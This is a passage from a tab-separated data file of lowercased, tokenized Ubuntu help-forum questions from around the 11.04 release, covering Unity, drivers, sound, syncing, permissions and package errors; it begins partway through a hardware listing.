00 width : 64 bits clock : 66mhz resources : memory:0-1fffffff *-pci:0 description : pci bridge product : rd790 pci to pci bridge ( external gfx0 port a ) vendor : ati technologies inc physical id : 2 bus info : pci @ 0000:00:02.0 version : 00 width : 32 bits clock : 33mhz capabilities : pci pm pciexpress msi ht normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:10 ioport : e000 ( size=4096 ) memory : feb00000-febfffff ioport : d0000000 ( size=268435456 ) *-display description : vga compatible controller product : juniper [ radeon hd 5700 series ] vendor : ati technologies inc physical id : 0 bus info : pci @ 0000:02:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=fglrx_pci latency=0 resources : irq:10 memory : d0000000-dfffffff memory : febe0000-febfffff ioport : e000 ( size=256 ) memory : febc0000-febdffff *-multimedia description : audio device product : juniper hdmi audio [ radeon hd 5700 series ] vendor : ati technologies inc physical id : 0.1 bus info : pci @ 0000:02:00.1 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:11 memory : febbc000-febbffff *-pci:1 description : pci bridge product : rd790 pci to pci bridge ( pci express gpp port f ) vendor : ati technologies inc physical id : a bus info : pci @ 0000:00:0a.0 version : 00 width : 32 bits clock : 33mhz capabilities : pci pm pciexpress msi ht normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:10 ioport : d000 ( size=4096 ) memory : fea00000-feafffff ioport : cff00000 ( size=1048576 ) *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 02 serial : 00:25:22:5a : f8:78 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.0.4 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:10 ioport : d800 ( size=256 ) memory : cffff000-cfffffff memory : cffe0000-cffeffff memory : feaf0000-feafffff *-storage description : sata controller product : sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] vendor : ati technologies inc physical id : 11 bus info : pci @ 0000:00:11.0 logical name : scsi0 version : 00 width : 32 bits clock : 66mhz capabilities : storage pm msi ahci_1.0 bus_master cap_list emulated configuration : driver=ahci latency=32 resources : irq:11 ioport : c000 ( size=8 ) ioport : b000 ( size=4 ) ioport : a000 ( size=8 ) ioport:9000 ( size=4 ) ioport:8000 ( size=16 ) memory : fe9ff800-fe9ffbff *-disk description : ata disk product : ocz-vertex2 physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 1.32 serial : ocz-sgvcnp7yx4n4sep7 size : 55gib ( 60gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=000df786 *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 logical name : / version : 1.0 serial : 726dc46e-de39-4fd4-b7c1-9aba13d54e2d size : 51gib capacity : 51gib capabilities : primary bootable journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2011-04-16 07:13:02 filesystem=ext4 lastmountpoint=/ modified=2011-04-16 07:16:44 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , barrier=1 , data=ordered mounted=2011-04-16 07:44:24 state=mounted *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 size : 4094mib capacity : 4094mib capabilities : primary extended partitioned partitioned : extended *-logicalvolume description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 4094mib capabilities : nofs *-usb:0 description : usb controller product : sb7x0/sb8x0/sb9x0 usb ohci0 controller vendor : ati technologies inc physical id : 12 bus info : pci @ 0000:00:12.0 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=32 resources : irq:7 memory : fe9fe000-fe9fefff *-usb:1 description : usb controller product : sb7x0 usb ohci1 controller vendor : ati technologies inc physical id : 12.1 bus info : pci @ 0000:00:12.1 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=32 resources : irq:7 memory : fe9fd000-fe9fdfff *-usb:2 description : usb controller product : sb7x0/sb8x0/sb9x0 usb ehci controller vendor : ati technologies inc physical id : 12.2 bus info : pci @ 0000:00:12.2 version : 00 width : 32 bits clock : 66mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=32 resources : irq:10 memory : fe9ff000-fe9ff0ff *-usb:3 description : usb controller product : sb7x0/sb8x0/sb9x0 usb ohci0 controller vendor : ati technologies inc physical id : 13 bus info : pci @ 0000:00:13.0 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=32 resources : irq:10 memory : fe9fc000-fe9fcfff *-usb:4 description : usb controller product : sb7x0 usb ohci1 controller vendor : ati technologies inc physical id : 13.1 bus info : pci @ 0000:00:13.1 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=32 resources : irq:10 memory : fe9fb000-fe9fbfff *-usb:5 description : usb controller product : sb7x0/sb8x0/sb9x0 usb ehci controller vendor : ati technologies inc physical id : 13.2 bus info : pci @ 0000:00:13.2 version : 00 width : 32 bits clock : 66mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=32 resources : irq:11 memory : fe9fa800-fe9fa8ff *-serial unclaimed description : smbus product : sbx00 smbus controller vendor : ati technologies inc physical id : 14 bus info : pci @ 0000:00:14.0 version : 3c width : 32 bits clock : 66mhz capabilities : ht cap_list configuration : latency=0 *-ide description : ide interface product : sb7x0/sb8x0/sb9x0 ide controller vendor : ati technologies inc physical id : 14.1 bus info : pci @ 0000:00:14.1 version : 00 width : 32 bits clock : 66mhz capabilities : ide msi bus_master cap_list configuration : driver=pata_atiixp latency=64 resources : irq:7 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport : ff00 ( size=16 ) *-multimedia description : audio device product : sbx00 azalia ( intel hda ) vendor : ati technologies inc physical id : 14.2 bus info : pci @ 0000:00:14.2 version : 00 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : driver=hda intel latency=32 resources : irq:7 memory : fe9f4000-fe9f7fff *-isa description : isa bridge product : sb7x0/sb8x0/sb9x0 lpc host controller vendor : ati technologies inc physical id : 14.3 bus info : pci @ 0000:00:14.3 version : 00 width : 32 bits clock : 66mhz capabilities : isa bus_master configuration : latency=0 *-pci:2 description : pci bridge product : sbx00 pci to pci bridge vendor : ati technologies inc physical id : 14.4 bus info : pci @ 0000:00:14.4 version : 00 width : 32 bits clock : 66mhz capabilities : pci subtractive_decode bus_master *-usb:6 description : usb controller product : sb7x0/sb8x0/sb9x0 usb ohci2 controller vendor : ati technologies inc physical id : 14.5 bus info : pci @ 0000:00:14.5 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=32 resources : irq:10 memory : fe9f9000-fe9f9fff *-pci:1 description : host bridge product : family 10h processor hypertransport configuration vendor : hynix semiconductor ( hyundai electronics ) physical id : 101 bus info : pci @ 0000:00:18.0 version : 00 width : 32 bits clock : 33mhz *-pci:2 description : host bridge product : family 10h processor address map vendor : hynix semiconductor ( hyundai electronics ) physical id : 102 bus info : pci @ 0000:00:18.1 version : 00 width : 32 bits clock : 33mhz *-pci:3 description : host bridge product : family 10h processor dram controller vendor : hynix semiconductor ( hyundai electronics ) physical id : 103 bus info : pci @ 0000:00:18.2 version : 00 width : 32 bits clock : 33mhz *-pci:4 description : host bridge product : family 10h processor miscellaneous control vendor : hynix semiconductor ( hyundai electronics ) physical id : 104 bus info : pci @ 0000:00:18.3 version : 00 width : 32 bits clock : 33mhz configuration : driver=k10temp resources : irq:0 *-pci:5 description : host bridge product : family 10h processor link control vendor : hynix semiconductor ( hyundai electronics ) physical id : 105 bus info : pci @ 0000:00:18.4 version : 00 width : 32 bits clock : 33mhz thanks for any advice .
35365	will the nouveau driver continue to get updates ?	i installed natty yesterday and it gave me the option to install `` experimental 3d support for nvidia cards '' ( which i 'm assuming is nouveau ) . now , is there a ppa i will need to add to receive regular updates for the driver or will canonical push updates out to me automatically ?
35366	my folders have been synced but i do n't see any files	i recently signed up for a a 20 gb ubuntu one account for 2.99 per month because i wanted to sync some of my home folders . it 's been a week now . my tomboy notes synced fine , but after selecting my documents , pictures , and music folders to be synced i only see my folder names but no files when i go my dashboard on the ubuntu one site .
35367	general rules for dealing with file permissions	i have run into a ton of file permission issues in ubuntu , from not having permission to delete a file , change the contents of a while , and so on . i was wondering if some of you ubuntu experts could share how you generally deal with file permission issues ? what are some general guidelines and terminal commands to keep in mind ? thanks in advance .
35368	is nautilus elementary compatible ?	has anybody tried installing nautilus elementary in 11.04 ?
35369	can the network indicator be hidden ?	using 11.04 . the network indicator is visible at all times , but this is n't necessary for me , it just adds clutter . is there any way to hide/remove it ? thanks !
35373	delete a directory	consider this example . i download a tar.gz file from the internet and open the contents of that file into a directory . let 's say i choose to remove the directory . unfortunately , i do not have permission to delete the directory . what do i do ? i get an error message that i do n't have permission to remove this directory . ~ $ cd /home/amathew ~ $ sudo tar xzf hadoop-0.20.2.tar.gz ~ $ sudo mv hadoop-0.20.2 hadoop ~ $ sudo chown -r hadoop : hadoop hadoop thanks in advance . edit : ~ $ lsattr -rvadlv hadoop lsattr 1.41.12 ( 17-may-2010 ) 2903294105 hadoop extents
35376	can i set the scrolling speed when i mouse over the launcher ?	is there a setting to increase the scroll speed of the unity panel when using the mouse . when in keyboard mode the launcher will scroll quickly , however with the mouse over event action scrolling though a number of panel items at the bottom is too slow
35377	how do i get gajim to show up in unity 's system tray ?	i know how to whitelist most other applications , but adding 'gajim ' and 'gajim ' does n't seem to work . does it have an appindicator ?
35382	can any browser switch to already open tab , if address you 're opening is already open ?	if `` https : //mail.google.com '' is already open a tab , it it possible to have a browser switch to that tab if i try opening `` https : //mail.google.com '' in a different tab ? what if i try opening the new address via cli ( eg , google-chrome https : //mail.google.com ) ? can i get it to switch to already open tab ? do any of the major browsers ( firefox , chrome , chromium , etc ) have this feature ?
35385	music player incorrectly identifies downloaded music as `` streaming ''	i am playing some music that i got from youtube . on both movie player and rhythmbox music player at the bottom of the movie player it says `` streaming '' . it does n't let me control it -- i ca n't drag around the play head to different parts in the music -- but it will let me pause , play , or stop . why does n't this file let me move around in the track like a normal music file ?
35386	keeping monitor dell desk monitor 'connected ' to dell studio 15 laptop ?	first of all , i am new to ubuntu 10.04 but it is love at first sight and the only windows i will see again are in my house and car ! each time i disconnect my dell studio 15 from my dell 36 '' monitor , i have to reconnect through the system/monitor protocol . question : is there a way to set it up so once i slide my laptop under the stand , reconnect monitor cable , 3 usb 's and press start that the monitor screen will go 'live ' without having to start all over ?
35390	login sound plays , but no sound during session	when i installed ubuntu , everything was great . but one day , i heard the login sound but no sound on the desktop session . this happens every time . i have reinstalled sound drivers several times , checked that the speakers are not muted , checked the settings in alsa-mixer , tried all the troubleshooting tips on the net , checked user privileges too but of no help . this is a real problem , please help ! i am using ubuntu 10.04lts and a alc662 sound card . my computer is detecting the sound card and there are no problems with my speakers.this maybe a bug but i can not file a report as i do n't have enough information .
35391	ca n't find external cd/dvd in virtual box/windows xp mode ?	if this is the wrong forum i apologize . as i mentioned in another question , i am new to linux but will never go back to windows ! the internal cd/dvd on my dell studio 15 laptop died ( gee what a surprise ! ) . so i purchased a dell external cd/dvd w/r 8x optical drive . it is cool in that it connects via two usb 's that consolidate to one connector to the retractable on the drive ... ... no power cord . anyway , when i am in ubuntu i can see the drive . but when i am vb/windows xp i can find it . under computer it only shows the internal 'dead ' one . the friend who set this up for see up a number of 'outlets ' but each time i press one i get 'connection not established ' . i can 'see ' the two usb flash drives in windows/vb that i can easily access in ubuntu . what am i 'not seeing ' ( pardon the late night east coast humor ) . and thanks if anyone can help .
35392	how to launch a new instance of google chrome from the command line ?	is there any way i can launch a new instance of google chrome from the command line ? i 'm not referring to opening a new window - i want a new instance . here 's why : suppose i open chrome and navigate to a page somewhere . then i ssh into the same account from somewhere else . when i run : google-chrome ... all i get is a new tab in the existing window . this is absolutely useless when i 'm connected via ssh . how can i launch a separate instance of chrome that runs in the same account , but is usable with ssh ?
35393	after restart , how can i ssh into my system ?	i have restarted my system remotely , but now when i try to ssh , i get the message ssh : connect to host desktop.hostname port 22 : connection timed out and when i try to ping it : ping desktop.hostname ( 111.111.111.11 ) 56 ( 84 ) bytes of data . from localhost ( 222.222.222.22 ) icmp_seq=1 destination host unreachable is there a way to remotely access my computer ?
35394	how can i pause/resume an apt-get update process in a terminal ?	my internet gets paused sometimes because of change in the 3g signal strength and i 've to restart the whole apt-get update process again ! each update consumes 13-15 mb and every mb costs here ! ! can i do something to pause the update so that i can resume it after i connect my internet again ! p.s - i know that i can resume downloads of apps/upgrade
35396	how to access an ubuntu machine via vnc from the login screen ?	i want to access an ubuntu machine remotely via vnc . but i can access the ubuntu machine only if the user is logged in . i want to access the ubuntu machine via vnc from the login screen itself . we can access all windows machines from the login screen . however we were not able to access the ubuntu machine from the login screen . there is some way but i am not aware of the details . can someone give a solution to this problem ?
35399	whitelisting ports for detection in rkhunter	i 'm trying to figure out in the rkhunter config how i can whitelist the detection of certain ports , such as ports used for ircds , and other ports which i have for services which run on non-standard ports . does anyone know how to configure this so that rkhunter does not throw warnings about detecting the ports i wish to whitelist ?
35401	how do i give ubuntu more space ( when installed inside windows 7 ( via wubi ) ) ?	i had installed ubuntu inside windows xp but then i formatted xp and installed windows 7 . edit1 : i used wubi for the same . i want to know which one of the two will solve my problem ? creating a virtual disk or resizing root ? also is resizing root possible as the 4gb ext4 partition is already in a ntfs format hard drive partition . at the time of installation i had allocated only 4gb of space to ubuntu . i want to increase that size as i keep getting a low disk space notification . i have surfed through a lot of similar questions but this is not a duplicate . because i want to know a little about the file systems . in order to solve my problem , do i have to increase the size of root.disk ? or will it be solved by creating a virtual disk ? also i want to know the difference between creating a virtual disk and just increasing disk space of root.i 'm new to ubuntu so i do n't know how the file systems function . edit2 : i have created a virtual disk of 10gb , but i 'm still getting the same notification.is there anyway to install all further applications on the virtual disk i created ?
35404	why i ca n't swap the windows on window list at gnome panel after upgrading ?	i am sorry but let me include an image for better explanation . i had been entered into classic mode . sorry for my insufficient information . at 10.10 , the 'boxes ' can be swapped and in appearance in black background and movable position , but now lost . when i was using maverick 10.10 , i could swap the windows , the boxes with windows ' title , on the window list at gnome panel . however , after updating to natty 11.04 , this function is lost . now , the boxes sort according to the opening time , but , strangely , the sort rearranged after changes of the window 's title . the rearrangement is not happen every time . when i drag the boxes , pointer cursor with an icon appear but it is useless when i dropping it into anywhere , such as folders , panels , other boxes , and even trash . neither programs nor nautilus will be triggered after the drop . the preferences of mine is 'never group windows ' .
35408	will my intel video graphics work with compiz ?	i have an old intel graphics card ( from around 2002-2003 ) . compiz used to work fine until 9.10 but after 9.10 , using compiz via the terminal gives the following output and reverts to 2d interface : backend : gconf integration : true profile : default adding plugins initializing core options ... done initializing bailer options ... done initializing detection options ... done initializing composite options ... done compiz ( opengl ) - fatal : glx_ext_texture_from_pixmap is missing compiz ( opengl ) - fatal : software rendering detected compiz ( bailer ) - info : ensuring a shell for your session metacity compositing works fine but i really want to try out unity in natty . is there any way to achieve this ?
35412	conexant cx20582 earphone does not work	i 'm using ubuntu 10.10 desktop . and this is my sound hardware . codec : conexant cx20582 ( pebble ) codec : intel ibexpeak hdmi the sound output from the built-in speakers works , but there is no output from the earphone . how can i solve this ?
35417	ubuntu hangs while working	i have installed ubuntu 10.04 via wubi . frequently ubuntu hangs while working . even installer hanged when i tried to install ubuntu recent version , linux mint 10 via wubi & mint4win . is this problem related to hardware ? my configuraion is intel dual core 3 . ghz intel motherboard 160gb hdd 2 gb ddr2 ram i 'm using onboard graphics intel 82945g express chipset . no external graphic card .
35418	why does my $ path have only 3 entries ?	when i run echo $ path , i only get the following : /usr/local/bin : /usr/bin : /bin according to /etc/environment , i should be getting : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games i noticed this because i was n't to able to run a new game which i had just installed because /usr/games was not in my path . my .profile and .bashrc are normal .
35425	how can i know what version of ubuntu i 'm running ?	i have recently installed ubuntu 11.04 . my friend just asked me what beta i am using . how can i find out ?
35428	how do i run in terminal in unity alt + f2 ?	i do n't see any option to run commands in terminal in the run command dash ( or is it lens ? ) of unity . is it available and deactivated , or is the feature missing altogether ? in any case , i think this issue needs to be addressed .
35429	show firefox bookmarks button in firefox navigation bar ?	i tested natty beta 2 yesterday and found that the bookmarks button is hidden . the usual way to show it seems to be hiding the menubar under customize , however there is no menubar option in there now . is there a way to show the bookmarks button ? i can download firefox from mozilla and use that version but that 's not the best option .
35435	where 's the copy-paste progress window ?	assume , i want to copy a file from my home folder to a removable drive . i right click the file and click send to ... then i get the option to send to removable drive ... then i click send and the dialogue closes ! where is the copy progress dialogue ?
35436	files not synced	i 've signed up for the mobile plan . i 've started with the free 2gb space . i 've copied some mp3 files and directorioes into `` ubuntu one '' directory . after create some of the directories i copied ( only directories ) , the agent simply stopped the sync . after 40 minutos of nothing , i 've restarted it , and it resumed the directory creation . no files yet . disconnect and connect again , and it started to sync files . i leave it overnight , and it upload only 300mb before stop syncing again . i have to disconnect/connect again . i have ubuntu 10.10 and a fast connection ( never had this problem with dropbox ) . i think i wo n't go on after the trial month . i can not even check what file is being uploaded , i have to navigate the slow web interface to figure it out , peeking directory thru directory . the config window does n't even update the space used until i restart it . it 's very annoying . do you have some pointer for me to improve the experience ? so far is simply awful . regards , carlos
35440	.net and visual studio in ubuntu ?	i want to run .net in my ubuntu , is there is way for this and as all know that .net is famous for its ide ( visual studio ) , is that possible or there are other ide for the replacement of visual studio in the open source community , if so , how do i install it ?
35445	is there an inhibit sleep indicator for unity ?	in the classic gnome shell , you could add an inhibit applet to prevent the computer going to sleep . this does n't work with unity . is there an alternative and just easy way to prevent the computer temporarily following sleep power options ? the inhibit panel applet was as simple as a click .
35446	how to configure nokia 2700c phone in wammu ?	my phone is nokia 2700c ( java phone ) .please help me to connect it on wammu and gmobilemedia application with datacable .
35448	how do i download all the assets loaded by a webpage into a directory ?	i want to download and study every javascript file and ajax loaded resource that a particular webpage calls . it would be great if i could some how get the browser or some other tool to save all the resources that the webpage makes the browser load into one directory . is there any way to do this ?
35449	suddenly ca n't set my resolution to 1440x900 ( or any other wide screen res )	everything worked normally , but suddenly when i turned my computer on the resolution was messed up . i could n't set up any wide screen resolution . at first i was thinking riva tuner on win messed it up , because riva did the same thing on win . i fixed that and still nothing . i tried reinstalling ubuntu and updating drivers , but nothing worked ; so if anyone can help me , i 'd appreciate it .
35455	can not save tar.gz file to usr/local	i 'm using the following instruction to install and configure hadoop on ubuntu 10.10. http : //www.michael-noll.com/tutorials/running-hadoop-on-ubuntu-linux-single-node-cluster/ # installation i tried to save the compressed tar.gz file to /usr/local/ but it just wo n't save . i 've tried saving the tar.gz in my home folder and desktop and copying the files to the desired folder , but i get an error that tells me i do n't have permission . how do i save and extract a tar.gz folder to /usr/local/hadoop ?
35456	what are the minimum hardware requirements for 11.04 'natty ' ?	i performed an upgrade from 10.10 to 11.04 beta , to see if i could help with polishing the system before release . it was completely unusable on my system . i could only get `` bits and pieces '' of the `` classic '' desktop and nothing of `` unity '' .
35457	converting aac to mp3 via command line	original question is there some cli tool to convert aac files from the itunes store ( no drm ) to mp3 ? update 1 mp3 to mp3 i installed libavcodec-unstripped-52 and get a little further . when i try to encode mp3 files with it : it says [ mp3 @ 0x997cde0 ] header missing . lame also had problems since the tags are id3v2 , is it possible that the libmp3lame does not support that either ? should i convert the tags or what can i do to get this working ? aac to mp3 this went through , but there are no headers in the resulting mp3 file . how can i get the headers in there ?
35461	whats wrong with this zenity code ?	whats wrong with this code ? # ! /bin/bash arch= $ ( uname -m ) if [ `` $ arch '' = `` i686 '' ] ; then zenity -- info -- title= '' architechture checker '' -- text= '' your architechture is 32-bit '' if [ `` $ arch '' = `` x86_64 '' ] ; then zenity -- info -- title= '' architechture checker '' -- text= `` your architechture is 64-bit ''
35465	configuring two displays with unity	i am currently running ubuntu 11.04 beta 2 with unity on a laptop dell xps m1330 . my dell m1330 has an intel chipset and this is the result i get for running the lspci -nn | grep vga command : 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) [ 8086:2a02 ] ( rev 0c ) i have a 22 '' display at home , so i like to configure my laptop to have dual displays ( with the monitor preference gui tool ) . the way i use it is with an extended screen where each display ( my laptop and my other 22 '' lcd each works with their native resolution ) . everything works quite well except for a little annoyance which i was hoping someone can help me figure out . even though my lcd is configured to be on the left and my laptop on the right ( that is how the two are set up on my desk ) , the launcher and top-right ubuntu icon that brings up the dash always appears on my laptop screen , when i would like it to appear on my left screen . i attached a picture to visualize this better . any help would be greatly appreciated . btw , i checked out this question , and it does n't really cover what i 'm asking here . thanks .
35469	ubuntu on a a stick , fails to upgrade kernel	i was told to run sudo dpkg -- configure -a by ubuntu when i tried installing something with apt-get , it proceeded to try to install a new kernel but that failed . i 'm perplexed as to why that happens as it seems to be complaining about /dev not being mounted , but it is ( i mean i can access it ) . any ideas of what to do ? my installation of ubuntu is on a usb stick , as i 'm trying it out for the first time . $ sudo dpkg -- configure -a setting up linux-image-2.6.35-28-generic ( 2.6.35-28.50 ) ... running depmod . update-initramfs : generating /boot/initrd.img-2.6.35-28-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 2.6.35-28-generic /boot/vmlinuz-2.6.35-28-generic run-parts : executing /etc/kernel/postinst.d/nvidia-common 2.6.35-28-generic /boot/vmlinuz-2.6.35-28-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 2.6.35-28-generic /boot/vmlinuz-2.6.35-28-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 2.6.35-28-generic /boot/vmlinuz-2.6.35-28-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 2.6.35-28-generic /boot/vmlinuz-2.6.35-28-generic /usr/sbin/grub-probe : error : can not find a device for / ( is /dev mounted ? ) . run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-2.6.35-28-generic.postinst line 1010. dpkg : error processing linux-image-2.6.35-28-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up linux-image-2.6.35-22-generic ( 2.6.35-22.35 ) ... running depmod . update-initramfs : generating /boot/initrd.img-2.6.35-22-generic not updating initrd symbolic links since we are being updated/reinstalled ( 2.6.35-22.33 was configured last , according to dpkg ) not updating image symbolic links since we are being updated/reinstalled ( 2.6.35-22.33 was configured last , according to dpkg ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 2.6.35-22-generic /boot/vmlinuz-2.6.35-22-generic run-parts : executing /etc/kernel/postinst.d/nvidia-common 2.6.35-22-generic /boot/vmlinuz-2.6.35-22-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 2.6.35-22-generic /boot/vmlinuz-2.6.35-22-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 2.6.35-22-generic /boot/vmlinuz-2.6.35-22-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 2.6.35-22-generic /boot/vmlinuz-2.6.35-22-generic /usr/sbin/grub-probe : error : can not find a device for / ( is /dev mounted ? ) . run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-2.6.35-22-generic.postinst line 1010. dpkg : error processing linux-image-2.6.35-22-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-2.6.35-28-generic ; however : package linux-image-2.6.35-28-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 2.6.35.28.36 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-2.6.35-28-generic linux-image-2.6.35-22-generic linux-image-g eneric linux-generic i do have /dev mounted if i do ls /dev i get this : $ ls /dev autofs core fd input loop6 oldmem ram10 ram5 scd0 sg0 stdout tty15 tty23 tty31 tty4 tty48 tty56 tty7 usb v4l vcsa video0 block cpu full kmsg loop7 pktcdvd ram11 ram6 sda sg1 tty tty16 tty24 tty32 tty40 tty49 tty57 tty8 usbmon0 vcs vcsa1 zero bsg cpu_dma_latency fuse log mapper port ram12 ram7 sda1 sg2 tty0 tty17 tty25 tty33 tty41 tty5 tty58 tty9 usbmon1 vcs1 vcsa2 btrfs-control disk fw0 loop0 mcelog ppp ram13 ram8 sda2 shm tty1 tty18 tty26 tty34 tty42 tty50 tty59 ttys0 usbmon2 vcs2 vcsa3 bus dri hidraw0 loop1 mem psaux ram14 ram9 sda3 snapshot tty10 tty19 tty27 tty35 tty43 tty51 tty6 ttys1 usbmon3 vcs3 vcsa4 cdrom dvd hidraw1 loop2 net ptmx ram15 random sda4 snd tty11 tty2 tty28 tty36 tty44 tty52 tty60 ttys2 usbmon4 vcs4 vcsa5 cdrw dvdrw hidraw2 loop3 network_latency pts ram2 rfkill sda5 sr0 tty12 tty20 tty29 tty37 tty45 tty53 tty61 ttys3 usbmon5 vcs5 vcsa6 char ecryptfs hidraw3 loop4 network_throughput ram0 ram3 rtc sdb stderr tty13 tty21 tty3 tty38 tty46 tty54 tty62 uinput usbmon6 vcs6 vcsa7 console fb0 hpet loop5 null ram1 ram4 rtc0 sdb1 stdin tty14 tty22 tty30 tty39 tty47 tty55 tty63 urandom usbmon7 vcs7 vga_arbiter
35470	desktop guide for 11.04 provides incorrect information	in ubuntu natty , the ubuntu desktop guide ( f1 option from desktop ) . when you highlight 4 out of the 5 top links it shows a screenshot of gnome-shell and not of unity this could be confusing for new users . i was going to raise a bug for this but do n't know what package it belongs to . the links affected are : start applications windows and workspaces logout , power off and switch users overview of the desktop .
35471	how do you create a multipurpose launcher ?	i want to create a single launcher for chrome , banshee , thunderbird and gwibber . what is the easiest way to do this ?
35478	how do i mark a file as executable via a gui ?	how do i mark a file as executable using a graphical interface ( gui ) ?
35482	what is the best way to lock down unity for guest accounts ?	i have made a guest user account , where google chrome launches at startup . but users are still able to browse all applications from the unity launcher . how can i restrict access to all programs . i want to do this in unity only ( to prove to myself if this is even possible ) , and only let users see chrome and libreoffice . currently , they can see all programs and even system settings from the top-right power button .
35488	what custom launchers and unity quicklists are available ?	please note that right now , most of the information contained below is outdated and can not be updated . be careful , most of this wo n't work on ubuntu 12.04 and newer . creating a custom launcher for unity is simple . quicklists provide an easy and efficient way to quickly access commonly used tasks for a specific application . note : starting with ubuntu 11.10 , this popup option has vanished . launchers can now only be created by editing text files in your home folder . creating a custom launcher is easy . right-click on your desktop and click create a launcher . edit the .desktop file using a text editor . ( more information can be found here and here . ) so , which custom launchers do you use on unity ? note : please limit yourself to one custom launcher per answer . also , please provide a screenshot of it in action .
35491	how to change tooltip 's background color in xfce ?	how do i change tooltip 's background color on ubuntu desktop `` xfce '' . i know how to change in gnome but i ca n't find out how to do so in xfce . tooltip 's background color in eclipse is black , and font 's color is black too .
35492	where can i file a bug for having a `` primary '' display checkbox in gnome-display-properties ?	when working with two displays there is a question of which display is the `` primary '' . in the case of unity the primary display is the screen on which the launcher appears for instance . this property can be set using xrandr , but the gnome-display-properties utility does not give a gui way to set this . this bug was also raised upstream , and was apparently solved for gnome 3.0 . with the gnome 3.0 vs unity thing going on , i think that a bug like this should be addressed within unity as well ( and can not be resolved upstream ) . i wanted to file such a bug in launchpad , but did n't know where to do this . any help would be greatly appreciated .
35495	getting specific firefox source snapshots for installed firefox in lucid ( or whichever )	i can get latest snapshots with bzr no problem . what i am trying to do is get source snapshots for the installed version of firefox on ubuntu distribution whatever . i googled around a bit and it all comes back to use bzr to get source latest . apt-get source firefox-3.5 pulls in something , but it does n't contain source files . i could be mistaken on this , but i do n't see anything other than the debian directory . any guidance ?
35497	how to fix very slow ubuntu booting ?	when i boot up my my newly installed copy of ubuntu on my custom rig w/4gb ddr3 ram and a 3 ghz intel core i7 , it takes about a minute and a half at the purple loading screen , and then after logging in it takes a while for the icons to show up on the screen . this computer could run and boot windows 7 faster , so i have a problem here .
35500	how do i do right-click the icons on the unity launcher using keyboard keys ?	is there way to do get right click action on unity dash board icon launcher using keyboard shortcut ? . after doing alt+f1 , i could select the application only .
35506	ca n't install uwsgi	root @ ip-10-194-97-94 : ~ # apt-get install uwsgi reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : uwsgi : depends : uwsgi-python2.6 ( > = 0.9.6.5-0ubuntu1~lucid1 ) or uwsgi-python3.1 ( > = 0.9.6.5-0ubuntu1~lucid1 ) e : broken packages
35512	what is the difference between `ssh -y` ( trusted x11 forwarding ) and `ssh -x` ( untrusted x11 forwarding ) ?	what is the difference between ssh -y ( trusted x11 forwarding ) and ssh -x ( untrusted x11 forwarding ) ? as far as i have understood it , it has something to do with security , but i did not grasp the difference and when to use which .
